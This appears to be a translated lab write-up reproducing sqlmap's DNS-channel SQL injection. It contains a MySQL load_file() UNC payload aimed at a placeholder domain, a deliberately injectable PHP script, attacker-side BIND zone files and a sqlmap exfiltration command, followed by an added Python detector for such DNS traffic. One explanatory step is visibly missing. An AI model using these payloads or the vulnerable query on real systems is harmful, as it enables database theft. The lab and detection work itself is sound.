This WooYun article, http://drop.xbclub.org/static/drops/tips-5283.html, mentions sqlmap's --dns-domain option for DNS-channel injection, so I wanted to simulate it in a local environment for testing.
First, DNS injection.
mysql> show variables like '%skip%';
+------------------------+-------+
| Variable_name          | Value |
+------------------------+-------+
| skip_external_locking  | ON    |
| skip_name_resolve      | OFF   |
| skip_networking        | OFF   |
| skip_show_database     | OFF   |
| slave_skip_errors      | OFF   |
| sql_slave_skip_counter | 0     |
+------------------------+-------+
6 rows in set
Here skip_name_resolve is OFF, which means MySQL will resolve hostnames.
So what syntax makes MySQL issue a DNS query?
mysql> select load_file('\\\\fdsafdsfdssx.xxxx.com\\1.txt');
+-----------------------------------------------+
| load_file('\\\\fdsafdsfdssx.xxxx.com\\1.txt') |
+-----------------------------------------------+
| NULL                                          |
+-----------------------------------------------+
1 row in set

mysql> select '\\\\fdsafdsfdssx.xxxx.com\\1.txt';
+-------------------------------+
| \\fdsafdsfdssx.xxxx.com\1.txt |
+-------------------------------+
| \\fdsafdsfdssx.xxxx.com\1.txt |
+-------------------------------+
1 row in set
Here \\xxxxx.com\1.txt is a UNC path: MySQL tries to fetch the shared file over SMB, and because the host part is a domain name it must first issue a DNS query to look up the corresponding IP.
Then we can think of
To get the data.
Next, the simulated test environment uses sqlmap's --dns-domain parameter for DNS-channel injection.
A: Win8, web server with the SQL injection point
B: Ubuntu, sqlmap
C: Ubuntu, BIND9 service
First, on A set up a PHP + MySQL + Apache stack and quickly write a SQL injection point:
<?php
$con = mysql_connect("localhost", "root", "root") or die();
mysql_select_db("burp");
$id = $_GET['id'];
$sql = "select host from burp where id=" . $id;               // numeric type
//$sql = "select `new` from `sql` where id='" . $id . "'";   // string type
echo $sql;
$res = mysql_query($sql);
echo "<br><br>";
echo "<b>";
while ($rows = mysql_fetch_array($res, MYSQL_ASSOC)) {
    echo $rows['host'];
}
echo "</b>";
?>
It's a pretty obvious injection point.
B: sqlmap, nothing much to say.
C: BIND9 service, configured as follows:
zone "attaker.com" {
    type master;
    file "/etc/bind/zones/attaker.com.db";
};

zone "whoami.com" {
    type forward;
    forwarders { 192.168.199.144; };   # IP of machine B
};

# This is the zone definition for reverse DNS. Replace 0.168.192 with your
# network address in reverse notation, e.g. my network address is 192.168.0
zone "199.168.192.in-addr.arpa" {
    type master;
    file "/etc/bind/zones/rev.199.168.192.in-addr.arpa";
};
The key point is that whoami.com is forwarded to machine B.
/etc/bind/zones/attaker.com.db:

attaker.com.    IN  SOA ns1.attaker.com. admin.attaker.com. (
                        2006081401
                        28800
                        3600
                        604800
                        38400 )
attaker.com.    IN  NS  ns1.attaker.com.
attaker.com.    IN  MX  10  mta.attaker.com.
                IN  A   192.168.199.129
www             IN  A   192.168.199.129
mta             IN  A   192.168.199.129
ns1             IN  A   192.168.199.144
/etc/bind/zones/rev.199.168.192.in-addr.arpa:

@   IN  SOA ns1.attaker.com. admin.attaker.com. (
                        2006081401;
                        28800;
                        604800;
                        604800;
                        86400 )
    IN  NS  ns1.attaker.com.
1   IN  PTR attaker.com.
With this configured, start the BIND service.
Then point Win8's DNS server to the IP of C.
Start sqlmap:
python sqlmap.py -u "http://192.168.199.210/sqli.php?id=5000" --tech "B" --dns-domain "whoami.com" --dbs
At the same time, run tcpdump on B:
# tcpdump -i eth0 -nt port domain | grep whoami
You can see that machine A has sent DNS requests over.
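The names that reach B's tcpdump (and C's forwarder) are also where a defender catches this: every extracted chunk needs a fresh, never-cached hostname carrying the data. As an added example, not part of the original post or of sqlmap, here is a Python check over constructed BIND-style query-log lines (the sample and its prefix/hex/suffix label layout are made up for this example) that flags zones receiving many distinct names with a long hex-only label.

```python
import re
from collections import defaultdict

# Constructed BIND-style query-log lines (not captured from the lab on this page).
# The whoami.com names mimic exfiltration via load_file('\\\\<hex>.whoami.com\\1.txt'):
# a random prefix label, the stolen bytes hex-encoded into one label, a random suffix label.
SAMPLE_LOG = """\
client 192.168.199.210#51234: query: www.ubuntu.com IN A + (192.168.199.130)
client 192.168.199.210#51235: query: 4a4c.726f6f74406c6f63616c686f7374.7a4b.whoami.com IN A + (192.168.199.130)
client 192.168.199.210#51236: query: 4a4c.696e666f726d6174696f6e5f7363.7a4b.whoami.com IN A + (192.168.199.130)
client 192.168.199.210#51237: query: 4a4c.68656d612e62757270.7a4b.whoami.com IN A + (192.168.199.130)
client 192.168.199.210#51238: query: 4a4c.6d7973716c.7a4b.whoami.com IN A + (192.168.199.130)
client 192.168.199.210#51239: query: mail.attaker.com IN MX + (192.168.199.130)
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]{8,}$")   # a label that is nothing but 8+ hex digits

def zone_of(qname):
    """Crude zone grouping: the last two labels. Fine for a lab, not for public suffixes."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def hex_labels(qname):
    """Labels left of the zone that look like hex-encoded data."""
    return [lab for lab in qname.rstrip(".").split(".")[:-2] if HEX_LABEL_RE.match(lab)]

def flag_exfil_zones(log_text, min_unique=3):
    """Return {zone: sorted client IPs} for zones that received at least min_unique
    distinct names carrying a hex-only label. A cached answer triggers no new lookup,
    so the count of distinct hex-bearing names per zone is the signal, not volume."""
    names, clients = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m or not hex_labels(m.group("qname")):
            continue
        zone = zone_of(m.group("qname"))
        names[zone].add(m.group("qname"))
        clients[zone].add(m.group("client"))
    return {z: sorted(clients[z]) for z, n in names.items() if len(n) >= min_unique}

def decode_hex_labels(qname):
    """Best-effort decode of the hex labels so an analyst can see what left the database."""
    out = []
    for label in hex_labels(qname):
        try:
            out.append(bytes.fromhex(label).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            out.append(label)   # odd length or non-text payload: keep the raw label
    return out
```

Run against a real BIND "queries" log the regex would need adjusting to that version's line format; the zone grouping should also use a public-suffix list outside a lab.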
Finally, capture sqlmap's traffic with Burp.
Sqlmap --dns-domain Simulation Practice